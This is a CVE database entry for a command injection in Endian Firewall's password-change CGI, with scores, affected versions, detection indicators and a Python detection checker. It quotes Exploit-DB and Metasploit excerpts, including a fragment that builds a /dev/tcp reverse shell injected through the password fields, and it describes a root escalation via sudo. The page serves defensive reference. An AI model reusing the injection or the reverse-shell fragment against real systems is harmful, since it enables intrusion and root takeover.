CVE-2015-5082
Published 2015-09-28
Priority: P276 · CVSS 2.0 base score: 10 (critical)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT: public exploit code is indexed (see the Exploit-DB and Metasploit entries below)
EPSS: 69.91% (99.3rd percentile)
Endian Firewall before 3.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) NEW_PASSWORD_1 or (2) NEW_PASSWORD_2 parameter to cgi-bin/chpasswd.cgi.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| endian_firewall | endian_firewall | <= 2.5.1 | — |
Detection & IOCs (extracted from sources)
- Detect POST requests to /cgi-bin/chpasswd.cgi with multipart/form-data bodies containing shell metacharacters (e.g. semicolons, pipes) in the NEW_PASSWORD_1 or NEW_PASSWORD_2 fields.
- The exploit payload is injected as `<EFW_PASSWORD>; <cmd>;`; look for semicolon-delimited command injection patterns in the NEW_PASSWORD_1/NEW_PASSWORD_2 multipart form fields.
- Monitor for POST requests to /cgi-bin/chpasswd.cgi over HTTPS on port 10443 (the default Endian Firewall proxy management port).
- Alert on execution of /usr/local/bin/chrootpasswd by the 'nobody' account, which indicates post-exploitation privilege escalation via sudo on a compromised Endian Firewall.
- Detect outbound /dev/tcp reverse shell connections initiated from the Endian Firewall host (a 'nobody' process spawning a bash reverse shell via /dev/tcp).
- Versions >= 3.0.0 contain the vulnerable code, but it is never executed due to a bug in the CGI script; exploitation is not possible on these versions.
- Versions 2.3.x and 2.4.0 are also not exploitable due to a separate bug in the CGI script.
- Very early versions (e.g. 1.1 RC5) additionally require HTTP Basic Auth credentials to exploit; the exploit module's USERNAME/PASSWORD options supply those credentials for these versions.
- The exploit does NOT change the proxy user's password on vulnerable systems, so exploitation may be stealthy, with no visible account change.
- Confirmed vulnerable EFW Community versions are 1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2; any version from 1.1 RC5 to 2.2.x and 2.4.1/2.5.x should be considered at risk.
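Added example, not part of this page or of the exploit sources it lists: a Python checker that applies the first two detection items above to one captured request, parsing the multipart/form-data body and reporting any shell metacharacters found in NEW_PASSWORD_1 or NEW_PASSWORD_2. The boundary, the TEST-NET host and the request builder are constructed sample values.

```python
import re

TAINTED_FIELDS = ("NEW_PASSWORD_1", "NEW_PASSWORD_2")  # fields the CGI passed to a shell
SHELL_META = re.compile(r"[;|&`$()<>\n]")             # characters that escape the argument
TARGET_PATH = "/cgi-bin/chpasswd.cgi"

def parse_multipart(body: bytes, content_type: str) -> dict:
    """Return {field: value} for a multipart/form-data body (text parts only)."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        return {}
    fields = {}
    for part in body.split(b"--" + match.group(1).encode("latin-1"))[1:]:
        if part.strip() in (b"", b"--"):
            continue  # closing marker
        part_head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1).decode("latin-1")] = value.rstrip(b"\r\n").decode("latin-1", "replace")
    return fields

def check_chpasswd_request(raw: bytes) -> dict:
    """Map each tainted field to the metacharacters found in it; {} means clean."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path = request_line.split(" ")[:2]
    headers = dict((k.strip().lower(), v.strip()) for k, _, v in
                   (h.partition(":") for h in header_lines))
    ctype = headers.get("content-type", "")
    if method != "POST" or path != TARGET_PATH or "multipart/form-data" not in ctype:
        return {}  # only the password-change CGI with a form body is in scope
    fields = parse_multipart(body, ctype)
    hits = {}
    for field in TAINTED_FIELDS:
        found = SHELL_META.findall(fields.get(field, ""))
        if found:
            hits[field] = sorted(set(found))
    return hits

BOUNDARY = "----constructedboundary"  # constructed sample value, not from a real capture

def build_request(pw1: str, pw2: str) -> bytes:
    """Constructed sample POST to chpasswd.cgi on the default 10443 port (TEST-NET host)."""
    parts = "".join(f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
                    for n, v in (("NEW_PASSWORD_1", pw1), ("NEW_PASSWORD_2", pw2)))
    parts += f"--{BOUNDARY}--\r\n"
    head = (f"POST {TARGET_PATH} HTTP/1.1\r\nHost: 192.0.2.1:10443\r\n"
            f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n\r\n")
    return (head + parts).encode("latin-1")
```

Legitimate passwords can contain these characters, so treat a hit as a triage signal and confirm it against the host-side indicators above (chrootpasswd execution or /dev/tcp connections by the 'nobody' account).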
No detection rules found.
Exploit-DB: Endian Firewall - Password Change Command Injection (Metasploit) · exploitdb · 2015-09-07 · CVE-2015-5082

Module source excerpt:

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 'Endian Firewall Proxy Password Change Command Injection',
  'Description' => %q{
    This module exploits an OS command injection vulnerability in a
    web-accessible CGI script used to change passwords for locally-defined
    proxy user accounts. Valid credentials for such an account are
    required.
    Command execution will be in the context of the "nobody" account, but
    this account had broad sudo permissions, including to run the script
    /usr/local/bin/chrootpasswd (which changes the password for the Linux
    root account on the system to the value specified by co
```
Exploit-DB: Endian Firewall < 3.0.0 - OS Command Injection · exploitdb · 2015-06-29 · CVE-2015-5082

Exploit source excerpt (the listing begins mid-statement):

```python
& /dev/tcp/" + reverseShellIP + "/" + reverseShellPort + " 0>&1;"
endianURL = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI
conn = httplib.HTTPSConnection(targetIP, targetPort)
headers = {}
headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0"
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
headers["Accept-Encoding"] = ""
headers["Referer"] = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI
headers["Content-Type"] = "multipart/form-data; boundary=" + multipartDelimiter
headers["Accept-Language"] = "en-US,en;q=0.5"
headers["Connection"] = "keep-alive"
# the body uses the boundary with the leading "--" that the header omits
multipartDelimiter = "--" + multipartDelimiter
body = multipartDelimiter + "\r\n"
```
Exploit-DB: Endian Firewall < 3.0.0 - OS Command Injection (Metasploit) · exploitdb · 2015-06-29 · CVE-2015-5082

Module description excerpt:

```ruby
'Description' => %q{
  This module exploits an OS command injection vulnerability in a
  web-accessible CGI script used to change passwords for locally-defined
  proxy user accounts. Valid credentials for such an account are
  required.
  Command execution will be in the context of the "nobody" account, but
  on versions of EFW I tested, this account had broad sudo permissions,
  including to run the script /usr/local/bin/chrootpasswd as root. This
  script changes the password for the Linux root account on the system
  to the value specified by console input once it is executed.
  The password for the proxy user account specified will *not* be
  changed by the use of this module, as long as the target system is
  vulnerable to the exploit.
  Very early versions of Endian Firewall (e.g. 1.1 RC5) req
```
Metasploit: Endian Firewall Proxy Password Change Command Injection

This module exploits an OS command injection vulnerability in a web-accessible CGI script used to change passwords for locally-defined proxy user accounts. Valid credentials for such an account are required. Command execution will be in the context of the "nobody" account, but this account had broad sudo permissions, including to run the script /usr/local/bin/chrootpasswd (which changes the password for the Linux root account on the system to the value specified by console input once it is executed). The password for the proxy user account specified will *not* be changed by the use of this module, as long as the target system is vulnerable to the exploit. Very early versions of Endian Firewall (e.g. 1.1 RC5) require HTTP basic auth c
No writeups or analysis indexed.
References:
- http://packetstormsecurity.com/files/133469/Endian-Firewall-Proxy-Password-Change-Command-Injection.html
- http://www.rapid7.com/db/modules/exploit/linux/http/efw_chpasswd_exec
- https://www.exploit-db.com/exploits/37426/
- https://www.exploit-db.com/exploits/37428/
- https://www.exploit-db.com/exploits/38096/